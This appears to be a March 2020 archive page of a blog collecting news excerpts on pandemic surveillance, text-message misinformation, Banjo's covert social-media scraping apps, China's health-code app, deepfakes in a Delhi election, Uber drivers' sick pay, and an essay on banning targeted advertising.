Archives March 2020

As Coronavirus Surveillance Escalates, Personal Privacy Plummets

Tracking entire populations to combat the pandemic now could open the doors to more invasive forms of government snooping later.

In South Korea, government agencies are harnessing surveillance-camera footage, smartphone location data and credit card purchase records to help trace the recent movements of coronavirus patients and establish virus transmission chains. In Lombardy, Italy, the authorities are analyzing location data transmitted by citizens’ mobile phones to determine how many people are obeying a government lockdown order and the typical distances they move every day. About 40 percent are moving around “too much,” an official recently said. In Israel, the country’s internal security agency is poised to start using a cache of mobile phone location data — originally intended for counterterrorism operations — to try to pinpoint citizens who may have been exposed to the virus.

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus — even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale. Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later. It is a lesson Americans learned after the terrorist attacks of Sept. 11, 2001, civil liberties experts say. Nearly two decades later, law enforcement agencies have access to higher-powered surveillance systems, like fine-grained location tracking and facial recognition — technologies that may be repurposed to further political agendas like anti-immigration policies. Civil liberties experts warn that the public has little recourse to challenge these digital exercises of state power.

In Fast-Moving Pandemic, Sources of Falsehoods Spread by Text, Email, WhatsApp and TikTok

Misleading text messages claiming that President Trump was going to announce a national quarantine buzzed into cellphones across the country over the weekend, underscoring how rapidly false claims are spreading — and how often it is happening beyond the familiar misinformation vehicles of Facebook and Twitter. The false texts spread so widely that on Sunday night the White House’s National Security Council, fearing the texts were an attempt to spook the stock market as it opened Monday, decided to directly debunk the misleading claims in a Twitter post: “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” But by then the messages already had spread widely, as had similar ones both in the United States and Europe in recent days. Text messages, encrypted communication apps such as WhatsApp and some social media platforms have carried similarly alarming misinformation, much of it with the apparent goal of spurring people to overrun stores to buy basic items ahead of a new wave of government restrictions.

The one claiming that Trump was going to impose a national quarantine included the advice: “Stock up on whatever you guys need to make sure you have a two week supply of everything. Please forward to your network.” In fact, authorities have warned against aggressive buying that could disrupt supply chains and fuel panic. Trump addressed the misleading text messages at an afternoon news conference Monday, saying, “It could be that you have some foreign groups that are playing games.” On the possibility of a national quarantine, Trump said: “We haven’t determined to do that at all. … Hopefully we won’t have to.”

Surveillance Company Banjo Used a Secret Company and Fake Apps To Scrape Social Media

Banjo, an artificial intelligence firm that works with police used a shadow company to create an array of Android and iOS apps that looked innocuous but were specifically designed to secretly scrape social media. The news signifies an abuse of data by a government contractor, with Banjo going far beyond what companies which scrape social networks usually do. Banjo created a secret company named Pink Unicorn Labs, according to three former Banjo employees, with two of them adding that the company developed the apps. This was done to avoid detection by social networks, two of the former employees said.

Three of the apps created by Pink Unicorn Labs were called “One Direction Fan App,” “EDM Fan App,” and “Formula Racing App.” Motherboard found these three apps on archive sites and downloaded and analyzed them, as did an independent expert. The apps — which appear to have been originally compiled in 2015 and were on the Play Store until 2016 according to Google — outwardly had no connection to Banjo, but an analysis of its code indicates connections to the company. This aspect of Banjo’s operation has some similarities with the Cambridge Analytica scandal, with multiple sources comparing the two incidents. […] The company has not publicly explained how it specifically scrapes social media apps. Motherboard found the apps developed by Pink Unicorn Labs included code mentioning signing into Facebook, Twitter, Instagram, Russian social media app VK, FourSquare, Google Plus, and Chinese social network Sina Weibo.
The apps could have scraped social media “by sending the saved login token to a server for Banjo to use later, or by using the app itself to scrape information,” reports Motherboard, noting that it’s not entirely clear which method Banjo used. “Motherboard found that the apps when opened made web requests to the domain ‘pulapi.com,’ likely referring to Pink Unicorn Labs, but the site that would provide a response to the app is currently down.”

Last weekend, Motherboard reported that Banjo signed a $20.7 million contract with Utah in 2019 that granted the company access to the state’s traffic, CCTV, and public safety cameras. “Banjo promises to combine that input with a range of other data such as satellites and social media posts to create a system that it claims alerts law enforcement of crimes or events in real-time.”

In Coronavirus Fight, China Gives Citizens a Color Code, With Red Flags

A new system uses software to dictate quarantines — and appears to send personal data to police, in a troubling precedent for automated social control. As China encourages people to return to work despite the coronavirus outbreak, it has begun a bold mass experiment in using data to regulate citizens’ lives — by requiring them to use software on their smartphones that dictates whether they should be quarantined or allowed into subways, malls and other public spaces. But a New York Times analysis of the software’s code found that the system does more than decide in real time whether someone poses a contagion risk. It also appears to share information with the police, setting a template for new forms of automated social control that could persist long after the epidemic subsides.

The Alipay Health Code, as China’s official news media has called the system, was first introduced in the eastern city of Hangzhou — a project by the local government with the help of Ant Financial, a sister company of the e-commerce giant Alibaba. People in China sign up through Ant’s popular wallet app, Alipay, and are assigned a color code — green, yellow or red — that indicates their health status. The system is already in use in 200 cities and is being rolled out nationwide, Ant says. Neither the company nor Chinese officials have explained in detail how the system classifies people. That has caused fear and bewilderment among those who are ordered to isolate themselves and have no idea why.

Airbnb ‘Surveillance Bugs To Make Sure Guests Behave’

“So this is creepy,” writes a Forbes cybersecurity reporter, saying Airbnb “has put aside the stories of hosts secretly spying on guests” to promote a new line of devices Forbes calls “surveillance bugs to make sure guests behave.”

“… we’re hurtling toward a world where almost everything we own is monitoring us in some way, and I’m not sure that’s actually going to be a safer world.”

First Use of Deepfakes In an Indian Election Campaign

The Delhi Bharatiya Janata Party (BJP) has partnered with political communications firm The Ideaz Factory to create “positive campaigns” using deepfakes to reach different linguistic voter bases, reports Nilesh Christopher reports via Motherboard. It marks the debut of deepfakes in election campaigns in India.

On February 7, a day ahead of the Legislative Assembly elections in Delhi, two videos of the Bharatiya Janata Party (BJP) President Manoj Tiwari criticizing the incumbent Delhi government of Arvind Kejriwal went viral on WhatsApp. While one video had Tiwari speak in English, the other was him speaking in the Hindi dialect of Haryanvi. “[Kejriwal] cheated us on the basis of promises. But now Delhi has a chance to change it all. Press the lotus button on February 8 to form the Modi-led government,” he said. One may think that this 44-second monologue might be a part of standard political outreach, but there is one thing that’s not standard: These videos were not real. [The original video can be viewed here.]

“Deepfake technology has helped us scale campaign efforts like never before,” Neelkant Bakshi, co-incharge of social media and IT for BJP Delhi, tells VICE. “The Haryanvi videos let us convincingly approach the target audience even if the candidate didn’t speak the language of the voter.” Tiwari’s fabricated video was used widely to dissuade the large Haryanvi-speaking migrant worker population in Delhi from voting for the rival political party. According to Bakshi, these deepfakes were distributed across 5,800 WhatsApp groups in the Delhi and NCR region, reaching approximately 15 million people.

‘These People Are Evil’: Drivers Speak Out Against Uber’s New Coronavirus Sick Leave Fund

Countless Uber drivers are now being pushed to the front lines of the coronavirus pandemic, transporting humans, food, supplies, and maybe soon Covid-19 testing kits as shelter-in-place rules cause demand for delivery services to spike. Yet despite their exposure to infection, gig workers lack paid sick leave, health benefits, or unemployment insurance because of their status as independent contractors.

Earlier this month, Uber, Lyft, and Amazon drivers protested the exclusion of gig workers from Silicon Valley’s monumental heave to protect itself from the coronavirus. As technology employees go remote, contractors are burdened with extra demands and no additional support. Uber, Lyft, and Amazon eventually agreed to compensate gig workers through ad hoc funds, but OneZero spoke to Uber drivers who say this is hardly a safety net. “I think I’m going to fall through the cracks,” said Kimberly James, a 46-year-old driver for Uber Eats in Atlanta, Georgia. After a series of devastating hardships, including losing her house in a fire, James has come to rely on food delivery platforms like Uber Eats and DoorDash to survive.

In 2012, James was diagnosed with an autoimmune disorder, and her weekly income of $400 means she cannot afford to get sick. Health officials have warned that the coronavirus is especially dangerous for immunocompromised people, so today James has no choice but to isolate indoors. One-time payouts are based on a person’s average daily earnings for the past six months. Someone making $28.57 per day is eligible for a payment of $400, the equivalent of 14 days of average pay, while someone earning $121.42 per day can receive $1,700, Uber says on its website. To qualify, drivers must have completed one trip in the 30 days before March 6, 2020, when the global program was first announced.

Why Don’t We Just Ban Targeted Advertising?

Google and Facebook, including their subsidiaries like Instagram and YouTube, make about 83 percent and 99 percent of their respective revenue from one thing: selling ads. It’s the same story with Twitter and other free sites and apps. More to the point, these companies are in the business of what’s called behavioral advertising, which allows companies to aim their marketing based on everything from users’ sexual orientations to their moods and menstrual cycles, as revealed by everything they do on their devices and every place they take them. It follows that most of the unsavory things the platforms do—boost inflammatory content, track our whereabouts, enable election manipulation, crush the news industry—stem from the goal of boosting ad revenues. Instead of trying to clean up all these messes one by one, the logic goes, why not just remove the underlying financial incentive? Targeting ads based on individual user data didn’t even really exist until the past decade. (Indeed, Google still makes many billions of dollars from ads tied to search terms, which aren’t user-specific.) What if companies simply weren’t allowed to do it anymore?

Let’s pretend it really happened. Imagine Congress passed a law tomorrow morning that banned companies from doing any ad microtargeting whatsoever. Close your eyes and picture what life would be like if the leading business model of the internet were banished from existence. How would things be different?

Many of the changes would be subtle. You could buy a pair of shoes on Amazon without Reebok ads following you for months. Perhaps you’d see some listings that you didn’t see before, for jobs or real estate. That’s especially likely if you’re African-American, or a woman, or a member of another disadvantaged group. You might come to understand that microtargeting had supercharged advertisers’ ability to discriminate, even when they weren’t trying to.